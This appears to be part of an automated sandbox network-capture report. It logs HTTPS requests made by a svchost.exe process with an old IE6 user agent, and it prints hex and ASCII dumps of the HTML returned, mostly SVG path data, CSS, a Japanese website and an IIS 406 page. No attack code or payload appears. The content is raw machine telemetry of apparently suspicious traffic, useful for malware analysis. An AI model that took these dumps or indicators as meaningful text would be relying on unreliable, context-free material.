                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8245INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                  Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8261INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8277INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8293INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8309INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                  Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8325INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                  Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8341INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC8357INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                  Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  39192.168.2.42129775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5827OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: ldh.la.gov
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5827INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:35 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 1346
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5828INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  4192.168.2.45013049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC77OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: nts-web.net
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC82INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:53:36 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 2599149
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                  ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC83INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC98INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                  Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC148INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC164INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                  Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                  2023-07-27 19:53:36 UTC180INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC230INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                  Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC246INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                  2023-07-27 19:53:37 UTC262INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
